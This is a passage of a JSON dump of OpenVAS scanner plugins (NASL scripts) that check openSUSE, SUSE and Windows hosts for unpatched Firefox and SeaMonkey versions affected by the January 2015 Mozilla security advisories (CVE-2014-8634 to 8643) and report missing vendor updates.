get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"35.0\"))\n{\n fix = \"35.0\";\n report = 'Installed version: ' + ffVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:38:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-02-03T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for seamonkey (openSUSE-SU-2015:0192-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850632", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850632\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-02-03 05:45:00 +0100 (Tue, 03 Feb 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2014-8643\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"openSUSE: Security Advisory for seamonkey (openSUSE-SU-2015:0192-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla seamonkey was updated to SeaMonkey 2.32 (bnc#910669)\n\n * MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety\n hazards\n\n * MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use\n during bitmap rendering\n\n * MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n\n * MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through\n Proxy Authenticate responses\n\n * MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory\n in Web Audio\n\n * MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n * MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media\n Plugin sandbox escape\n\n * MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder\n certificates failure with id-pkix-ocsp-nocheck extension\n\n * MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM\n objects\n\n - use GStreamer 1.0 from 13.2 on\");\n\n script_tag(name:\"affected\", value:\"seamonkey on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:0192-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-debugsource\", rpm:\"seamonkey-debugsource~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.32~44.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:38:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2015:0077-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850629", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850629\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 05:36:13 +0100 (Tue, 20 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2014-8643\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2015:0077-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaFirefox'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MozillaFirefox was updated to version 35.0 (bnc#910669)\n\n Notable features:\n\n * Firefox Hello with new rooms-based conversations model\n\n * Implemented HTTP Public Key Pinning Extension (for enhanced\n authentication of encrypted connections)\n\n Security fixes:\n\n * MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety\n hazards\n\n * MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use during\n bitmap rendering\n\n * MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n\n * MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy\n Authenticate responses\n\n * MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory in\n Web Audio\n\n * MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n * MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media\n Plugin sandbox escape\n\n * MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder\n certificates failure with id-pkix-ocsp-nocheck extension\n\n * MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM\n objects\n\n - obsolete tracker-miner-firefox 0.15 because it leads to startup\n crashes (bnc#908892)\");\n\n script_tag(name:\"affected\", value:\"MozillaFirefox on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:0077-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-buildsymbols\", rpm:\"MozillaFirefox-buildsymbols~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debuginfo\", rpm:\"MozillaFirefox-debuginfo~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debugsource\", rpm:\"MozillaFirefox-debugsource~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-devel\", rpm:\"MozillaFirefox-devel~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-common\", rpm:\"MozillaFirefox-translations-common~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-other\", rpm:\"MozillaFirefox-translations-other~35.0~54.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:14:03", "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox Multiple Vulnerabilities-01 Jan15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805248", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805248", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Multiple Vulnerabilities-01 Jan15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805248\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-8643\", \"CVE-2014-8642\", \"CVE-2014-8641\", \"CVE-2014-8640\",\n \"CVE-2014-8639\", \"CVE-2014-8638\", \"CVE-2014-8637\", \"CVE-2014-8636\",\n \"CVE-2014-8635\", \"CVE-2014-8634\");\n script_bugtraq_id(72043, 72042, 72044, 72045, 72046, 72047, 72048, 72041,\n 72050, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 12:51:45 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"Mozilla Firefox Multiple Vulnerabilities-01 Jan15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Some unspecified errors.\n\n - An error when rendering a bitmap image by the bitmap decoder within a\n canvas element.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - A use-after-free error when handling tracks within WebRTC.\n\n - An unspecified error related to the GMP (Gecko Media Plugin) sandbox.\n\n - An error when handling the 'id-pkix-ocsp-nocheck' extension during\n verification of a delegated OCSP (Online Certificate Status Protocol) response\n signing certificate.\n\n - An error when handling DOM (Document Object Model) objects with certain\n properties.\n\n - Improper restriction of timeline operations by the\n 'mozilla::dom::AudioParamTimeline::AudioNodeInputValue' function in the Web\n Audio API.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox before version 35.0 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 35.0\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-07\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"35.0\"))\n{\n fix = \"35.0\";\n report = 'Installed version: ' + ffVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:36:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2015:0077-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850681", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850681", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850681\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:37:39 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2014-8643\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2015:0077-2)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaFirefox'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MozillaFirefox was updated to version 35.0 (bnc#910669)\n\n Notable features:\n\n * Firefox Hello with new rooms-based conversations model\n\n * Implemented HTTP Public Key Pinning Extension (for enhanced\n authentication of encrypted connections)\n\n Security fixes:\n\n * MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety\n hazards\n\n * MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use during\n bitmap rendering\n\n * MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n\n * MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy\n Authenticate responses\n\n * MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory in\n Web Audio\n\n * MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n * MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media\n Plugin sandbox escape\n\n * MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder\n certificates failure with id-pkix-ocsp-nocheck extension\n\n * MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM\n objects\n\n - obsolete tracker-miner-firefox 0.15 because it leads to startup\n crashes (bnc#908892)\");\n\n script_tag(name:\"affected\", value:\"MozillaFirefox on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:0077-2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-buildsymbols\", rpm:\"MozillaFirefox-buildsymbols~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debuginfo\", rpm:\"MozillaFirefox-debuginfo~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debugsource\", rpm:\"MozillaFirefox-debugsource~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-devel\", rpm:\"MozillaFirefox-devel~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-common\", rpm:\"MozillaFirefox-translations-common~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-other\", rpm:\"MozillaFirefox-translations-other~35.0~9.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:37:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for Mozilla (SUSE-SU-2015:0173-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-1569", "CVE-2014-8638"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851048", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851048\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:54:35 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Mozilla (SUSE-SU-2015:0173-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Mozilla'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and\n security issues.\n\n Mozilla NSS has been updated to 3.17.3, fixing a security issue and\n updating the root certificates list.\n\n For more information, please refer to\n Security Issues:\n\n * CVE-2014-1569\n\n * CVE-2014-8634\n\n * CVE-2014-8639\n\n * CVE-2014-8641\n\n * CVE-2014-8638\n\n * CVE-2014-8636\n\n * CVE-2014-8637\n\n * CVE-2014-8640\");\n\n script_tag(name:\"affected\", value:\"Mozilla on SUSE Linux Enterprise Server 11 SP2 LTSS, SUSE Linux Enterprise Server 11 SP1 LTSS\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0173-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLES11\\.0SP2|SLES11\\.0SP1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP2\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~31.4.0esr~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~31.4.0esr~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3\", rpm:\"libfreebl3~3.17.3~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss\", rpm:\"mozilla-nss~3.17.3~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-devel\", rpm:\"mozilla-nss-devel~3.17.3~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools\", 